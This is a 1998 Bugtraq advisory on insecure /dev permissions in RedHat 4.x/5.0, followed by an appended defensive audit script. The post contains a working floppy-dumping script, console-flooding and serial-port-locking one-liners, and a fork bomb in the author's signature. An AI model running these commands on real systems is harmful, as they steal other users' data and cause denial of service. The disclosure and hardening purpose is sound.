RedHat 4.x/5.0 /dev permissions
daemon@ATHENA.MIT.EDU (Michał Zalews)
Wed Feb 4 11:32:19 1998
Date: Wed, 4 Feb 1998 09:45:37 +0100
Reply-To: Michał Zalewski <lcamtuf@POLBOX.COM>
From: Michał Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
First one
----------
Any user can read data from a floppy (even one that is not mounted) using
"cat /dev/fd0H1440". It isn't dangerous in itself, but... any user
may write a script which periodically checks if a floppy has
just been unmounted, then dumps its content to a file. Here's a sample
'floppy collector':
-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=LABEL+1
      DUMPED=1
    fi
  else
    DUMPED=0
  fi
done
-- eof --
Also, if there's no floppy in the drive, an unprivileged user may flood
the kernel log console (the local console by default!!!):
[user@host sth]$ while :; do cat /dev/fd0H1440;done &
It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to the console (default klogd behaviour). Also,
every printk(...) (called by the fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.
Second one
-----------
(not tested with RH 5.0)
Ordinary users are allowed to read /dev/ttyS*. The serial port driver
disallows multiple access attempts at the same time, so a user may
permanently lock a chosen port using this command:
[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy
Now the serial port is in an unusable state.
That's all?
------------
There are also a lot of other, not-so-common devices, e.g. /dev/sequencer,
which are world-readable or even world-writable.
There's no reason at all to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain interesting
data or cause system failure by reading/writing these devices.
Solution...
------------
ls -l /dev/* | grep "r-- "
chmod ;)
_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
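As an added example that is not part of the original post, a small POSIX sh audit in the spirit of the "Solution" section: it reads `ls -l` output for a device directory, flags character and block nodes whose "others" bits grant read or write, skips a short allowlist of nodes that normally must stay world-accessible, and prints the chmod that closes each hole. The allowlist and the function names are assumptions, not anything from the post.

```shell
#!/bin/sh
# Added example (not from the original post): audit a device directory for
# world-readable or world-writable character/block nodes, following the
# "ls -l /dev/* | grep" check in the post, and emit a chmod for each finding.

# Nodes expected to stay world-accessible on a normal system.
# This allowlist is an assumption; adjust it for the machine being audited.
ALLOW='null zero full tty random urandom ptmx'

allowed() {
    for a in $ALLOW; do
        [ "$1" = "$a" ] && return 0
    done
    return 1
}

# audit_dev_listing DIR   (reads `ls -l DIR` output on stdin)
# Prints "<path> <mode> <problem>" for every offending device node.
audit_dev_listing() {
    dir=$1
    while read -r mode _links _owner _group rest; do
        # Only character (c...) and block (b...) device nodes matter here;
        # regular files, symlinks, directories and the "total" line are skipped.
        case $mode in
            c*|b*) ;;
            *) continue ;;
        esac
        name=${rest##* }              # the file name is the last field
        allowed "$name" && continue
        # Permission string: positions 8-10 are the "others" bits (rwx).
        case $mode in
            ????????w*) problem=world-writable ;;
            ???????r*)  problem=world-readable ;;
            *)          continue ;;
        esac
        printf '%s/%s %s %s\n' "$dir" "$name" "$mode" "$problem"
    done
}

# fix_commands DIR: same stdin, emits one "chmod o-rw" per offending node.
fix_commands() {
    audit_dev_listing "$1" | while read -r path _mode _problem; do
        printf 'chmod o-rw %s\n' "$path"
    done
}

# Live use on a real system:  ls -l /dev | audit_dev_listing /dev
```

Review the report before running the emitted chmod lines; some devices (sound, pseudo-terminals) may legitimately need group access instead of a blanket o-rw removal.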